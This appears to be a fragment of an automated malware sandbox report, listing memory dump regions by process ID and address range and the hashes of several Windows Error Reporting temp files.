memory/2968-90-0x0000000140000000-0x0000000140028000-memory.dmp

memory/2968-89-0x0000000140000000-0x0000000140028000-memory.dmp

memory/2968-92-0x00007FF85F110000-0x00007FF85F1CE000-memory.dmp

memory/4308-94-0x0000000000400000-0x0000000000420000-memory.dmp

memory/4308-93-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2968-91-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/4308-96-0x0000000000400000-0x0000000000420000-memory.dmp

memory/4308-98-0x0000000000A50000-0x0000000000A6A000-memory.dmp

memory/2968-100-0x0000000140000000-0x0000000140028000-memory.dmp

memory/612-102-0x0000023AAACE0000-0x0000023AAAD02000-memory.dmp

memory/668-106-0x00000274E9C40000-0x00000274E9C67000-memory.dmp

memory/612-107-0x00007FF81F9F0000-0x00007FF81FA00000-memory.dmp

memory/948-115-0x000002943C100000-0x000002943C127000-memory.dmp

memory/432-122-0x00007FF81F9F0000-0x00007FF81FA00000-memory.dmp

memory/1080-132-0x00007FF81F9F0000-0x00007FF81FA00000-memory.dmp

memory/1080-131-0x000001C46CD10000-0x000001C46CD37000-memory.dmp

memory/1044-129-0x00007FF81F9F0000-0x00007FF81FA00000-memory.dmp

memory/1044-128-0x0000028659160000-0x0000028659187000-memory.dmp

memory/432-121-0x000001EC9E2E0000-0x000001EC9E307000-memory.dmp

memory/512-119-0x00007FF81F9F0000-0x00007FF81FA00000-memory.dmp

memory/512-118-0x0000021FBF0F0000-0x0000021FBF117000-memory.dmp

memory/60-113-0x00007FF81F9F0000-0x00007FF81FA00000-memory.dmp

memory/60-112-0x000002B4A0BF0000-0x000002B4A0C17000-memory.dmp

memory/612-104-0x0000023AAAD10000-0x0000023AAAD37000-memory.dmp

memory/668-109-0x00007FF81F9F0000-0x00007FF81FA00000-memory.dmp

memory/5080-360-0x00007FF840760000-0x00007FF841221000-memory.dmp

memory/5080-361-0x00007FF840763000-0x00007FF840765000-memory.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER867.tmp.csv

MD5 65ce09b722ecf827aae10e98e4e9746f
SHA1 221a8e493a238bdf35d88f878dda3ba1da3547aa
SHA256 048c5934d097a3ace1ef2747c48dae26be1097ce2f5e4f92596e5c367fd1b912
SHA512 e215431f13fb75e811e9ab9dbe50514bc004ab94e38973fcebcf8526f95cc1e8bcdfc0383e27b84ac7acbf4425c3036fa172984d5e9e8bdb192bcb149746d643

C:\ProgramData\Microsoft\Windows\WER\Temp\WER888.tmp.txt

MD5 66a3e71657e3f7d486d693a22ee3b370
SHA1 2522afffdefe5a6cf95d5891226f3f164675e27b
SHA256 5b2a100ab3cce6e42021ce1ffa2900de181357c686349572e47cd5c4f8d75c05
SHA512 8c36ea932fa0f398c4da05004a7a3aebd41334c9fdf7bc338796ad575f7906f72dec5b8807bdb4693284ef798f7cd51a47cd900059003e0aaf9ce99a72edf84c

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD8.tmp.csv

MD5 07ba14325f8f14099b836c1eb6a79b4b
SHA1 afb593845b0810abcca5025e7673144bb314ef69
SHA256 b02cc980383ed038895e6f5a6e8baef48a11a4ed62c60b0d8a967c03b70b088f
SHA512 1352b600c764c36c78a1511dc6336188cf0c3bbb235c93b947d6414212374068e8e3b14b3521003556b8f57ffb36fccdbfe3f50425e04b9b2cb10dd934c6dbee

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDF8.tmp.txt

MD5 1542241ca7698c9ebb1bd6b0b9d2428e
SHA1 844bade770e2ef218356638ede59208ea54daffa
SHA256 4329206aa00b056033ec0c4fa82acb9ea58e3e77192c89770e455c5e25f185d2
SHA512 356a0e61d1a9af784a95bbf25a4e73167914aea263106d0a05c7b3e853e08405eb28b238f2102e8fc3c1ed4e0fd045bada52a563663e29e464b7b05590dadb64

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC4.tmp.csv

MD5 8d818a0d24168da0e30af9fc0a61c2e3
SHA1 bd40213831979f9c306dd74544e8f6cb9d912c70
SHA256 7323c7d6923c64455916d255c1000d7e1aac2184b1e231e31beac8b2275e3abc
SHA512 b9026e876024b4435c193cae6009d4db0b0bbf7ee832be2981275e359fc4296b59f045b9e307d8c008a4a9303b87a8601c65bc9f96c838de77f84a7614086e0d

C:\ProgramData\Microsoft\Windows\WER\Temp\WERED5.tmp.txt

MD5 399bef253fdcf44237eddd6c05f9a99e
SHA1 043e9d4001f8aa0465e6c2e87decf5195e5c62b1
SHA256 21e63de8ab9ec048b7ad12a3595876f44a762e1fce97a24c7c3316b79a3e31a1
SHA512 9467963b1831ec071bd5c40e7c3e2b91c25758f703c1e08ae848508f52ac68eaf5a48b5909eb65e175e9bc1a3bc47bfd6523d0876d6b4a6d90839b1199cef328

memory/5080-1555-0x00007FF84D513000-0x00007FF84D514000-memory.dmp

memory/5080-1558-0x00007FF840760000-0x00007FF841221000-memory.dmp